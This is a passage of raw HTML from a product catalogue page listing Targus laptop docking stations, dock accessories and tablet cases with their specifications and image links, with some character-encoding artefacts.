HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard/mice, and laptop chargers.</p><p>4K docking stationsÂ are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. OurÂ dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\" alt=\"expand your potential dock quad docking station\" width=\"519\" height=\"348\" /></p>		\n			<h1>Docking Stations</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal QUAD HD (QVHD) Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK520USZ)</p><h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal DV4K Docking Station with 100W Power</strong></h3><p style=\"text-align: center;\">(DOCK190AP)</p><h3 style=\"text-align: center;\"><strong>Thunderboltâ„¢ 3 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK220AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\" width=\"222\" height=\"222\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\" alt=\"USB-Câ„¢ Universal DV4K Docking Station with 100W Power\" width=\"210\" height=\"210\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/Dock220_grande.jpg?v=1553684715\" alt=\"Thunderboltâ„¢ 3 DV4K Docking Station with Power\" width=\"214\" height=\"214\" /></p><ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C 3.0 Port with power (15W non-PD)</li></ul><ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPortâ„¢ (DP 1.2a) and 2 HDMI (HDMI 2.0) ports</li><li>Power Delivery up to 100W</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C USB 3.1 Gen 1 device port</li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot</li><li>Power tips included to power AcerÂ®, ASUSÂ®, CompaqÂ®, Dellâ„¢, FujitsuÂ®, GatewayÂ®, HPÂ®, IBM/Lenovoâ„¢, and Toshiba</li></ul><ul><li>0.5M passive 40G, 5A cable (C/M to C/M)</li><li>Cable lock slot</li><li>Power Delivery 2.0 up to 85W</li><li>Supports dual-display</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK171)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK177)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK160AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACP71USZ_grande.png?v=1551118350\" alt=\"Universal USB 3.0 DV Docking Station with Power\" width=\"197\" height=\"197\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\" alt=\"Universal USB 3.0 DV4K Docking Station with Power\" width=\"205\" height=\"205\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock160usz_grande.png?v=1554473002\" alt=\"Universal USB 3.0 DV4K Docking Station\" width=\"205\" height=\"205\" /></p><ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone power and charging tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB ÂµB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li></ul><ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB 3.0 uB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset</li></ul><ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each</li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio</li><li>1 USB-C device port (USB 3.0 5Gbps data only)</li><li>1 Gigabit Ethernet port for wired connectivity</li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)</li><li>1 3.5mm combo Audio In/Out port for mics, speakers, and earphones</li><li>Includes 1-meter USB-ÂµB/M to A/M cable (detachable)</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment</li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms</li><li>Includes 45W AC adapter</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>USB-C Universal DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK180AP)</p><h3 style=\"text-align: center;\"><strong>USB-C Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK410AP)</p><h3 style=\"text-align: center;\"><strong>2K Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK120AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\" alt=\"USB-C Universal DV4K Docking Station with Power\" width=\"234\" height=\"234\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0041279_usb-c-universal-docking-station-black.jpeg\" width=\"236\" height=\"236\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\" alt=\"2K Universal Docking Station\" width=\"238\" height=\"238\" /></p><ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors</li><li>Power Delivery 2.0 provides up to 60W charging</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C device port (USB 3.0 data only)</li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access</li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)</li><li>Includes 1-meter USB-C to C host cable (detachable)</li><li>1 3.5mm combo Audio In/Out for mics, speakers, and earphones</li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates industry-standard security locks</li></ul><ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard security locks to safeguard equipment</li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems</li></ul><ul><li>1 Audio In/Out port for mics, speakers and earphones</li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)</li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds</li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals</li><li>1 USB 3.0 powered port for fast device charging</li><li>Integrated Lock Slot accommodates security locks to safeguard equipment</li><li>Universal compatibility with popular brands and operating systems</li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaLink Universal Dual Video Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK110AP)</p><h3 style=\"text-align: center;\"><strong>USB-C DisplayPortâ„¢ Alt-Mode Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK411)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(DOCK412AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock110usz_grande.jpg?v=1553684661\" alt=\"VersaLink Universal Dual Video Travel Dock\" width=\"259\" height=\"180\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\" width=\"181\" height=\"181\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\" alt=\"Picture of USB-C Alt-Mode Travel Dock w/ PD (Black)\" width=\"187\" height=\"187\" /></p><ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.</li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.</li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability</li><li>Mac or PC compatible</li></ul><ul><li>Host-powered 90 mm tethered USB Type-C DisplayPortâ„¢ Alt-Mode (compatible with Thunderboltâ„¢ 3) host connection</li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection</li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port</li><li>1 Gigabit Ethernet port</li><li>HDMI includes 6 (5.1) channel audio</li><li>Universal compatibility with popular WindowsÂ® and macOSâ„¢ platforms</li><li>Compact size thatâ€™s ideal for travel</li></ul><ul><li>mDP (4096 x 2160 p30 max)</li><li>HDMI (4096 x 2160 p30 max)</li><li>VGA (1920 x 1200)</li><li>USB-C upstream cable (Laptop charging capable by PD pass through)</li><li>2 x USB 3.1 Gen 1 type A downstream port</li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support</li><li>Gigabit Ethernet; Lock Slot</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Dock Accessories</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-C to USB-A Cable</strong></h3><p style=\"text-align: center;\">(ACC1104GLX)</p><h3 style=\"text-align: center;\"><strong>3-Pin 3-Way Hydra DC Power Cable</strong></h3><p style=\"text-align: center;\">(ACC1009USX)</p><h3 style=\"text-align: center;\"><strong>USB-C Multiplexer Adapter</strong></h3><p style=\"text-align: center;\">(ACA46USZ)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(ACA42USZ)</p><p><img src=\"https://www.targus.com/content/images/thumbs/0053546_usb-cf-to-usb-30-am-cable.jpeg\" width=\"188\" height=\"188\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0030033_3-pin-3-way-hydra-dc-power-cable.png\" width=\"187\" height=\"187\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA47GLZ_MAIN1_grande.png?v=1564601685\" alt=\"USB-C Multiplexer Adapter\" width=\"189\" height=\"189\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA42USZ_grande.jpg?v=1553683594\" alt=\"USB-Câ„¢ Demultiplexer\" width=\"194\" height=\"194\" /></p><ul><li>USB Type-C female to USB 3.0 Type-A cable</li><li>10cm long with tether</li><li>Transfers data at rates up to 5 Gbps</li><li>Compatible with Targus DOCK180USZ</li></ul><ul><li>Powers up to 1 large and 1 small device simultaneously</li><li>Supports three connectors for multi-user and multi-device environments</li><li>Self-locking collars ensure tips and power cable stay in place</li><li>Uses existing Targus power cable and power tips from your powered dock (not included)</li></ul><ul><li>Supports USB-C laptops</li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ</li><li>Compact size for easy carrying</li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port</li><li>5 different charge profiles to ensure compatibility</li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C</li></ul><ul><li>1 USB-C/F port</li><li>Enables support for legacy host devices</li><li>Uses universal 3-pin power tip support</li><li>For use with DOCK 180</li><li>Supports power delivery charging up to 60W</li><li>Supports USB 3.0 data transfer up 5 Gbps</li><li>1 USB 3.0 Type A/M cable</li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Tablet Cases</h1>		\n		<h3 style=\"text-align: center;\"><strong>VersaVuÂ® Multi-Gen for 9.7\" IPad Pro, iPad Air 1, And 2</strong></h3><p style=\"text-align: center;\">(THZ634GL)</p><h3 style=\"text-align: center;\"><strong>3D Protection</strong><strong>â„¢ </strong><strong style=\"font-size: 1.25rem;\">Multi-Gen for </strong><strong style=\"font-size: 1.25rem;\">9.7 </strong><strong style=\"font-size: 1.25rem;\">iPad Pro, iPad Air 1, and 2</strong></h3><p style=\"text-align: center;\">(THZ635GL)</p><h3 style=\"text-align: center;\"><strong>New Pro-Tek Rotating iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73711GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ634GL_FRONT_grande.png?v=1549412474\" alt=\"Black VersaVuÂ® Classic Case (Black) for iPadÂ® (2017/2018) (THZ634GL) - Front\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\" width=\"194\" height=\"194\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ73711GL_MAIN1_grande.png?v=1569597181\" alt=\"Pro-Tek Rotating Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\" width=\"198\" height=\"198\" /></p><ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Patented 360Â° rotation for portrait/landscape views</li><li>Adjustable viewing angles and comfortable typing angle</li><li>Precision cut access to controls, ports, and camera</li><li>Tray design enhances audio performance</li><li>Integrated stylus holder protects your Apple Pencilâ„¢ or stylus</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Convenient sleep/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Infinite viewing angles plus comfortable typing position</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Flexible tray with reinforced corners and bezel protection</li><li>Precision-cut access to controls, ports, and camera lenses</li><li>Easy-grip textured cover with secure magnetic wrap closure</li><li>Tray design enhances audio performance</li><li>Convenient sleep/wake function works with iPad ProÂ  (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Color Black / Charcoal &amp; Silver</li><li>Passes military grade 4ft. drop testing</li><li>Geometric Pro-Tekâ„¢ design enhances protection</li><li>Reinforced corners guard against impact</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Virtually infinite viewing angles and comfortable typing position</li><li>Precision-cut access to controls, ports, and camera</li><li>Audio-enhancing sound scoops boost sound performance</li><li>Secure magnetic wrap closure</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>New Click-In iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73608GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu </strong><strong>iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu Signature iPad 9.7\" </strong><strong>2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73902GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73608GL_MAIN1_grande.jpg?v=1571711592\" alt=\"Click-In Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\" width=\"196\" height=\"196\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73803GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73902GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Signature Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\" width=\"197\" height=\"197\" /></p><ul><li>Available Color Black/Charcoal, Rose Gold &amp; Silver</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports, and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal, Blue &amp; Red</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tek </strong><strong>11-inchÂ  </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74502GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"192\" height=\"194\" /></p><ul><li>Available Color Black &amp; Gold</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch</strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tekâ„¢ </strong><strong>Rotating Case </strong><strong>12.9-inch iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ748GL)</p><h3 style=\"text-align: center;\"><strong>VersaVuÂ® Classic Case for </strong><strong>12.9-inch </strong><strong>iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ749GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"196\" height=\"196\" /></p><ul><li>Available Color Black, Red &amp; Burgundy</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing</li><li>Geometric Pro-Tekâ„¢ design delivers practical protection and enhances stability</li><li>Patented custom-molded tray with reinforced corners guard against impact</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing</li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>12.9-inchÂ </strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ750GL)</p><h3 style=\"text-align: center;\"><strong>SafePort Rugged </strong><strong>Case for </strong><strong>12.9-inch iPad </strong><strong>(6th gen. / 5th gen.)</strong></h3><p style=\"text-align: center;\">(THD138GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Signature Series Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\" width=\"189\" height=\"189\" /></p><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch)</li><li>Form-fit TPU shell with USA Military-Spec drop protection â€“ protects your device from 1.2m/4ft drops</li><li>Offers rugged protection in a slim, professional-looking case</li><li>Sound enhancing scoops for all iPad speakers</li><li>Integrated stand for stable viewing and comfortable typing</li><li>Optional detachable shoulder strap (THA101GLZ)</li><li>Compatible with the ambient light sensor and mic on your device</li><li>Clear window on back to display asset tag</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THZ779GL)</p><h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THD491GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\" width=\"193\" height=\"193\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\" width=\"192\" height=\"192\" /></p><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Non-slip interior for infinite viewing angles</li><li>Integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Keyboard 